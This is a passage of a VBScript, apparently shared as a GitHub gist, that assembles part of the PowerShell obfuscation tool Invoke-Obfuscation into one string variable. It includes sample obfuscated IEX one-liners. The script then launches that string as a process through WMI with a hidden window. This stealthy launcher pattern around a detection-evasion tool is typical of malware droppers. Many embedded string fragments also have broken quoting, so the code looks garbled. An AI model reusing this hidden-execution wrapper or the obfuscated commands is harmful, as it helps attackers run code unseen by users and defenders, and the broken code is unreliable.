Ouzw = Ouzw + "}
}
Function Show-Tutorial
{
<#
.SYNOPSIS
HELPE"
Ouzw = Ouzw + "R FUNCTION :: Displays tutorial information for In"
Ouzw = Ouzw + "voke-Obfuscation.
Invoke-Obfuscation Function: Sh"
Ouzw = Ouzw + "ow-Tutorial
Author: Daniel Bohannon (@danielhbohan"
Ouzw = Ouzw + "non)
License: Apache License, Version 2.0
Required"
Ouzw = Ouzw + " Dependencies: None
Optional Dependencies: None
"
Ouzw = Ouzw + ".DESCRIPTION
Show-Tutorial displays tutorial info"
Ouzw = Ouzw + "rmation for Invoke-Obfuscation.
.EXAMPLE
C:\PS> "
Ouzw = Ouzw + "Show-Tutorial
.NOTES
This is a personal project "
Ouzw = Ouzw + "developed by Daniel Bohannon while an employee at "
Ouzw = Ouzw + "MANDIANT, A FireEye Company.
.LINK
http://www.da"
Ouzw = Ouzw + "nielbohannon.com
#>
Write-Host "`n`nTUTORIAL""
Ouzw = Ouzw + " -NoNewLine -ForegroundColor Cyan
Write-Host ""
Ouzw = Ouzw + " :: Here is a quick tutorial showing you how to ge"
Ouzw = Ouzw + "t your obfuscation on:"
Write-Host "`n1) "
Ouzw = Ouzw + "" -NoNewLine -ForegroundColor Cyan
Write-Host "
Ouzw = Ouzw + ""Load a scriptblock (SET SCRIPTBLOCK) or a script "
Ouzw = Ouzw + "path/URL (SET SCRIPTPATH)."
Write-Host " SET"
Ouzw = Ouzw + " SCRIPTBLOCK Write-Host 'This is my test command' "
Ouzw = Ouzw + "-ForegroundColor Green" -ForegroundColor Green
"
Ouzw = Ouzw + "
Write-Host "`n2) " -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host "Navigate through the obfus"
Ouzw = Ouzw + "cation menus where the options are in" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " YELLOW" -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Yellow
Write-Host "."
Write-Host " GR"
Ouzw = Ouzw + "EEN" -NoNewLine -ForegroundColor Green
Write-H"
Ouzw = Ouzw + "ost " options apply obfuscation."
Write-Host ""
Ouzw = Ouzw + " Enter" -NoNewLine
Write-Host " BACK" -NoNew"
Ouzw = Ouzw + "Line -ForegroundColor Yellow
Write-Host "/" -N"
Ouzw = Ouzw + "oNewLine
Write-Host "CD .." -NoNewLine -Foregr"
Ouzw = Ouzw + "oundColor Yellow
Write-Host " to go to previou"
Ouzw = Ouzw + "s menu and" -NoNewLine
Write-Host " HOME" -NoN"
Ouzw = Ouzw + "ewline -ForegroundColor Yellow
Write-Host "/" "
Ouzw = Ouzw + "-NoNewline
Write-Host "MAIN" -NoNewline -Foreg"
Ouzw = Ouzw + "roundColor Yellow
Write-Host " to go to home m"
Ouzw = Ouzw + "enu.`n E.g. Enter" -NoNewLine
Write-Host " E"
Ouzw = Ouzw + "NCODING" -NoNewLine -ForegroundColor Yellow
Wr"
Ouzw = Ouzw + "ite-Host " & then" -NoNewLine
Write-Host " 5" "
Ouzw = Ouzw + "-NoNewLine -ForegroundColor Green
Write-Host ""
Ouzw = Ouzw + " to apply SecureString obfuscation."
Writ"
Ouzw = Ouzw + "e-Host "`n3) " -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host "Enter" -NoNewLine
Write-Host " T"
Ouzw = Ouzw + "EST" -NoNewLine -ForegroundColor Yellow
Write-"
Ouzw = Ouzw + "Host "/" -NoNewLine
Write-Host "EXEC" -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Yellow
Write-Host " to tes"
Ouzw = Ouzw + "t the obfuscated command locally.`n Enter" -NoNe"
Ouzw = Ouzw + "wLine
Write-Host " SHOW" -NoNewLine -Foregroun"
Ouzw = Ouzw + "dColor Yellow
Write-Host " to see the currentl"
Ouzw = Ouzw + "y obfuscated command."
Write-Host "`n4) ""
Ouzw = Ouzw + " -NoNewLine -ForegroundColor Cyan
Write-Host ""
Ouzw = Ouzw + "Enter" -NoNewLine
Write-Host " COPY" -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor Yellow
Write-Host "/" -NoNe"
Ouzw = Ouzw + "wLine
Write-Host "CLIP" -NoNewLine -Foreground"
Ouzw = Ouzw + "Color Yellow
Write-Host " to copy obfuscated c"
Ouzw = Ouzw + "ommand out to your clipboard."
Write-Host " "
Ouzw = Ouzw + "Enter" -NoNewLine
Write-Host " OUT" -NoNewLine"
Ouzw = Ouzw + " -ForegroundColor Yellow
Write-Host " to write"
Ouzw = Ouzw + " obfuscated command out to disk."
Write-H"
Ouzw = Ouzw + "ost "`n5) " -NoNewLine -ForegroundColor Cyan
W"
Ouzw = Ouzw + "rite-Host "Enter" -NoNewLine
Write-Host " RESE"
Ouzw = Ouzw + "T" -NoNewLine -ForegroundColor Yellow
Write-Ho"
Ouzw = Ouzw + "st " to remove all obfuscation and start over.`n "
Ouzw = Ouzw + " Enter" -NoNewLine
Write-Host " UNDO" -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Yellow
Write-Host " to und"
Ouzw = Ouzw + "o last obfuscation.`n Enter" -NoNewLine
Writ"
Ouzw = Ouzw + "e-Host " HELP" -NoNewLine -ForegroundColor Yellow
"
Ouzw = Ouzw + " Write-Host "/" -NoNewLine
Write-Host "?" -"
Ouzw = Ouzw + "NoNewLine -ForegroundColor Yellow
Write-Host ""
Ouzw = Ouzw + " for help menu."
Write-Host "`nAnd finall"
Ouzw = Ouzw + "y the obligatory `"Don't use this for evil, please"
Ouzw = Ouzw + "`"" -NoNewLine -ForegroundColor Cyan
Write-Hos"
Ouzw = Ouzw + "t " :)" -ForegroundColor Green
}
Function Out-Sc"
Ouzw = Ouzw + "riptContents
{
<#
.SYNOPSIS
HELPER FUNCTION :: Di"
Ouzw = Ouzw + "splays current obfuscated command for Invoke-Obfus"
Ouzw = Ouzw + "cation.
Invoke-Obfuscation Function: Out-ScriptCo"
Ouzw = Ouzw + "ntents
Author: Daniel Bohannon (@danielhbohannon)
"
Ouzw = Ouzw + "License: Apache License, Version 2.0
Required Depe"
Ouzw = Ouzw + "ndencies: None
Optional Dependencies: None
.DESC"
Ouzw = Ouzw + "RIPTION
Out-ScriptContents displays current obfus"
Ouzw = Ouzw + "cated command for Invoke-Obfuscation.
.PARAMETER "
Ouzw = Ouzw + "ScriptContents
Specifies the string containing yo"
Ouzw = Ouzw + "ur payload.
.PARAMETER PrintWarning
Switch to ou"
Ouzw = Ouzw + "tput redacted form of ScriptContents if they excee"
Ouzw = Ouzw + "d 8,190 characters.
.EXAMPLE
C:\PS> Out-ScriptCo"
Ouzw = Ouzw + "ntents
.NOTES
This is a personal project develop"
Ouzw = Ouzw + "ed by Daniel Bohannon while an employee at MANDIAN"
Ouzw = Ouzw + "T, A FireEye Company.
.LINK
http://www.danielboh"
Ouzw = Ouzw + "annon.com
#>
Param(
[Parameter(ValueF"
Ouzw = Ouzw + "romPipeline = $true)]
[String]
$Sc"
Ouzw = Ouzw + "riptContents,
[Switch]
$PrintWarn"
Ouzw = Ouzw + "ing
)
If($ScriptContents.Length -gt $CmdM"
Ouzw = Ouzw + "axLength)
{
# Output ScriptContents, h"
Ouzw = Ouzw + "andling if the size of ScriptContents exceeds $Cmd"
Ouzw = Ouzw + "MaxLength characters.
$RedactedPrintLength"
Ouzw = Ouzw + " = $CmdMaxLength/5
# Handle print"
Ouzw = Ouzw + "ing redaction message in middle of screen. #OCD
"
Ouzw = Ouzw + " $CmdLineWidth = (Get-Host).UI.RawUI.BufferSi"
Ouzw = Ouzw + "ze.Width
$RedactionMessage = "<REDACTED: O"
Ouzw = Ouzw + "bfuscatedLength = $($ScriptContents.Length)>"
"
Ouzw = Ouzw + " $CenteredRedactionMessageStartIndex = (($CmdLi"
Ouzw = Ouzw + "neWidth-$RedactionMessage.Length)/2) - "[*] Obfusc"
Ouzw = Ouzw + "atedCommand: ".Length
$CurrentRedactionMes"
Ouzw = Ouzw + "sageStartIndex = ($RedactedPrintLength % $CmdLineW"
Ouzw = Ouzw + "idth)
If($CurrentRedactionMessage"
Ouzw = Ouzw + "StartIndex -gt $CenteredRedactionMessageStartIndex"
Ouzw = Ouzw + ")
{
$RedactedPrintLength = $Re"
Ouzw = Ouzw + "dactedPrintLength-($CurrentRedactionMessageStartIn"
Ouzw = Ouzw + "dex-$CenteredRedactionMessageStartIndex)
}"
Ouzw = Ouzw + "
Else
{
$RedactedPrint"
Ouzw = Ouzw + "Length = $RedactedPrintLength+($CenteredRedactionM"
Ouzw = Ouzw + "essageStartIndex-$CurrentRedactionMessageStartInde"
Ouzw = Ouzw + "x)
}
Write-Host $ScriptConten"
Ouzw = Ouzw + "ts.SubString(0,$RedactedPrintLength) -NoNewLine -F"
Ouzw = Ouzw + "oregroundColor Magenta
Write-Host $Redacti"
Ouzw = Ouzw + "onMessage -NoNewLine -ForegroundColor Yellow
"
Ouzw = Ouzw + " Write-Host $ScriptContents.SubString($ScriptCon"
Ouzw = Ouzw + "tents.Length-$RedactedPrintLength) -ForegroundColo"
Ouzw = Ouzw + "r Magenta
}
Else
{
Write-Host "
Ouzw = Ouzw + "$ScriptContents -ForegroundColor Magenta
}
"
Ouzw = Ouzw + " # Make sure final command doesn't exceed cmd.exe"
Ouzw = Ouzw + "'s character limit.
If($ScriptContents.Length "
Ouzw = Ouzw + "-gt $CmdMaxLength)
{
If($PSBoundParame"
Ouzw = Ouzw + "ters['PrintWarning'])
{
Write-"
Ouzw = Ouzw + "Host "`nWARNING: This command exceeds the cmd.exe "
Ouzw = Ouzw + "maximum length of $CmdMaxLength." -ForegroundColor"
Ouzw = Ouzw + " Red
Write-Host " Its length i"
Ouzw = Ouzw + "s" -NoNewLine -ForegroundColor Red
Wri"
Ouzw = Ouzw + "te-Host " $($ScriptContents.Length)" -NoNewLine -F"
Ouzw = Ouzw + "oregroundColor Yellow
Write-Host " cha"
Ouzw = Ouzw + "racters." -ForegroundColor Red
}
}
} "
Ouzw = Ouzw + "
Function Show-AsciiArt
{
<#
.SYNOPSIS
"
Ouzw = Ouzw + "HELPER FUNCTION :: Displays random ASCII art for I"
Ouzw = Ouzw + "nvoke-Obfuscation.
Invoke-Obfuscation Function: S"
Ouzw = Ouzw + "how-AsciiArt
Author: Daniel Bohannon (@danielhboha"
Ouzw = Ouzw + "nnon)
License: Apache License, Version 2.0
Require"
Ouzw = Ouzw + "d Dependencies: None
Optional Dependencies: None
"
Ouzw = Ouzw + "
.DESCRIPTION
Show-AsciiArt displays random ASCII"
Ouzw = Ouzw + " art for Invoke-Obfuscation, and also displays ASC"
Ouzw = Ouzw + "II art during script startup.
.EXAMPLE
C:\PS> Sh"
Ouzw = Ouzw + "ow-AsciiArt
.NOTES
Credit for ASCII art font gen"
Ouzw = Ouzw + "eration: http://patorjk.com/software/taag/
This is"
Ouzw = Ouzw + " a personal project developed by Daniel Bohannon w"
Ouzw = Ouzw + "hile an employee at MANDIANT, A FireEye Company.
"
Ouzw = Ouzw + ".LINK
http://www.danielbohannon.com
#>
[Cmdle"
Ouzw = Ouzw + "tBinding()] Param (
[Parameter(Position = "
Ouzw = Ouzw + "0)]
[ValidateNotNullOrEmpty()]
[Sw"
Ouzw = Ouzw + "itch]
$Random
)
# Create multiple"
Ouzw = Ouzw + " ASCII art title banners.
$Spacing = "`t"
"
Ouzw = Ouzw + "$InvokeObfuscationAscii = @()
$InvokeObfuscat"
Ouzw = Ouzw + "ionAscii += $Spacing + ' ____ _"
Ouzw = Ouzw + "_ '
$InvokeObfusc"
Ouzw = Ouzw + "ationAscii += $Spacing + ' / _/___ _ ______ "
Ouzw = Ouzw + "/ /_____ '
$InvokeObfu"
Ouzw = Ouzw + "scationAscii += $Spacing + ' / // __ \ | / / __ "
Ouzw = Ouzw + "\/ //_/ _ \______ '
$InvokeOb"
Ouzw = Ouzw + "fuscationAscii += $Spacing + ' _/ // / / / |/ / /_"
Ouzw = Ouzw + "/ / ,< / __/_____/ '
$Invoke"
Ouzw = Ouzw + "ObfuscationAscii += $Spacing + '/______ /__|______"
Ouzw = Ouzw + "___/_/|_|\___/ __ _ '
$Invo"
Ouzw = Ouzw + "keObfuscationAscii += $Spacing + ' / __ \/ /_ / "
Ouzw = Ouzw + "__/_ ________________ _/ /_(_)___ ____ '
$In"
Ouzw = Ouzw + "vokeObfuscationAscii += $Spacing + ' / / / / __ \/"
Ouzw = Ouzw + " /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \'
$"
Ouzw = Ouzw + "InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ "
Ouzw = Ouzw + "/ __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /'
"
Ouzw = Ouzw + " $InvokeObfuscationAscii += $Spacing + '\____/_.__"
Ouzw = Ouzw + "_/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ '
"
Ouzw = Ouzw + "
# Ascii art to run only during script star"
Ouzw = Ouzw + "tup.
If(!$PSBoundParameters['Random'])
{
"
Ouzw = Ouzw + " $ArrowAscii = @()
$ArrowAscii += '"
Ouzw = Ouzw + " | '
$ArrowAscii += ' | '
$Arr"
Ouzw = Ouzw + "owAscii += ' \ / '
$ArrowAscii += ' V '
"
Ouzw = Ouzw + "
# Show actual obfuscation example (genera"
Ouzw = Ouzw + "ted with this tool) in reverse.
Write-Host"
Ouzw = Ouzw + " "`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t"
Ouzw = Ouzw + "93}32t93}32t34@110m111@105}115X115-101m114_112@120"
Ouzw = Ouzw + "@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q1"
Ouzw = Ouzw + "14_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{"
Ouzw = Ouzw + "112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t3"
Ouzw = Ouzw + "9V98t103V48t39-101}99}97V108}112t101_82_45{32@41X3"
Ouzw = Ouzw + "9{41_112t81_109_39m43{39-110t101@112{81t39X43@39t1"
Ouzw = Ouzw + "09_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39"
Ouzw = Ouzw + "@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m11"
Ouzw = Ouzw + "0{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70"
Ouzw = Ouzw + "-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t9"
Ouzw = Ouzw + "8m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32"
Ouzw = Ouzw + "t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q3"
Ouzw = Ouzw + "9_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_3"
Ouzw = Ouzw + "9X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_"
Ouzw = Ouzw + "111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{"
Ouzw = Ouzw + "98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t4"
Ouzw = Ouzw + "1{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}"
Ouzw = Ouzw + "98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-"
Ouzw = Ouzw + "39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t"
Ouzw = Ouzw + "39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t"
Ouzw = Ouzw + "82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m"
Ouzw = Ouzw + "91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}1"
Ouzw = Ouzw + "15_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t3"
Ouzw = Ouzw + "6V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '"
Ouzw = Ouzw + "{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Cha"
Ouzw = Ouzw + "r]) } ) -Join'' )" -ForegroundColor Cyan
S"
Ouzw = Ouzw + "tart-Sleep -Milliseconds 650
ForEach($Line"
Ouzw = Ouzw + " in $ArrowAscii) {Write-Host $Line -NoNewline; Wri"
Ouzw = Ouzw + "te-Host $Line -NoNewline; Write-Host $Line -NoNewl"
Ouzw = Ouzw + "ine; Write-Host $Line}
Start-Sleep -Millis"
Ouzw = Ouzw + "econds 100
Write-Host "`$N7 =[cha"
Ouzw = Ouzw + "r[ ] ] `"noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR"
Ouzw = Ouzw + "- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+"
Ouzw = Ouzw + "'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+"
Ouzw = Ouzw + " bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'"
Ouzw = Ouzw + "0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg"
Ouzw = Ouzw + "'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+"
Ouzw = Ouzw + "'g0'+'tIRwb'+'g0(. '((`";[Array]::Reverse(`$N7 ) ;"
Ouzw = Ouzw + " IEX (`$N7-Join '' )" -ForegroundColor Magenta
"
Ouzw = Ouzw + " Start-Sleep -Milliseconds 650
ForEach"
Ouzw = Ouzw + "($Line in $ArrowAscii) {Write-Host $Line -NoNewlin"
Ouzw = Ouzw + "e; Write-Host $Line -NoNewline; Write-Host $Line}
"
Ouzw = Ouzw + " Start-Sleep -Milliseconds 100
Wri"
Ouzw = Ouzw + "te-Host ".(`"wRIt`" + `"e-H`" + `"Ost`") ( `"I`""
Ouzw = Ouzw + " +`"nvoke`"+`"-Obfus`"+`"cat`" + `"io`" +`"n`") "
Ouzw = Ouzw + "-ForegroundColor ( 'Gre'+'en')" -ForegroundColor Y"
Ouzw = Ouzw + "ellow
Start-Sleep -Milliseconds 650
"
Ouzw = Ouzw + " ForEach($Line in $ArrowAscii) {Write-Host $Line "
Ouzw = Ouzw + "-NoNewline; Write-Host $Line}
Start-Sleep"
Ouzw = Ouzw + " -Milliseconds 100
Write-Host "Write-Host"
Ouzw = Ouzw + " `"Invoke-Obfuscation`" -ForegroundColor Green" -F"
Ouzw = Ouzw + "oregroundColor White
Start-Sleep -Millisec"
Ouzw = Ouzw + "onds 650
ForEach($Line in $ArrowAscii) {Wr"
Ouzw = Ouzw + "ite-Host $Line}
Start-Sleep -Milliseconds "
Ouzw = Ouzw + "100
# Write out below string in i"
Ouzw = Ouzw + "nteractive format.
Start-Sleep -Millisecon"
Ouzw = Ouzw + "ds 100
ForEach($Char in [Char[]]'Invoke-Ob"
Ouzw = Ouzw + "fuscation')
{
Start-Sleep -Mil"
Ouzw = Ouzw + "liseconds (Get-Random -Input @(25..200))
"
Ouzw = Ouzw + " Write-Host $Char -NoNewline -ForegroundColor Gr"
Ouzw = Ouzw + "een
}
Start-Sleep -Millis"
Ouzw = Ouzw + "econds 900
Write-Host ""
Start-Sle"
Ouzw = Ouzw + "ep -Milliseconds 300
Write-Host
#"
Ouzw = Ouzw + " Display primary ASCII art title banner.
$"
Ouzw = Ouzw + "RandomColor = (Get-Random -Input @('Green','Cyan',"
Ouzw = Ouzw + "'Yellow'))
ForEach($Line in $InvokeObfusca"
Ouzw = Ouzw + "tionAscii)
{
Write-Host $Line "
Ouzw = Ouzw + "-ForegroundColor $RandomColor
}
}
"
Ouzw = Ouzw + "Else
{
# ASCII option in Invoke-Obfusc"
Ouzw = Ouzw + "ation interactive console.
}
# Output to"
Ouzw = Ouzw + "ol banner after all ASCII art.
Write-Host ""
"
Ouzw = Ouzw + " Write-Host "`tTool :: Invoke-Obfuscation" -F"
Ouzw = Ouzw + "oregroundColor Magenta
Write-Host "`tAuthor :"
Ouzw = Ouzw + ": Daniel Bohannon (DBO)" -ForegroundColor Magenta
"
Ouzw = Ouzw + " Write-Host "`tTwitter :: @danielhbohannon" -Fo"
Ouzw = Ouzw + "regroundColor Magenta
Write-Host "`tBlog ::"
Ouzw = Ouzw + " http://danielbohannon.com" -ForegroundColor Magen"
Ouzw = Ouzw + "ta
Write-Host "`tGithub :: https://github.com"
Ouzw = Ouzw + "/danielbohannon/Invoke-Obfuscation" -ForegroundCol"
Ouzw = Ouzw + "or Magenta
Write-Host "`tVersion :: 1.8" -Fore"
Ouzw = Ouzw + "groundColor Magenta
Write-Host "`tLicense :: A"
Ouzw = Ouzw + "pache License, Version 2.0" -ForegroundColor Magen"
Ouzw = Ouzw + "ta
Write-Host "`tNotes :: If(!`$Caffeinated)"
Ouzw = Ouzw + " {Exit}" -ForegroundColor Magenta
}"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create Ouzw, Null, objConfig, intProcessID
End Function
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment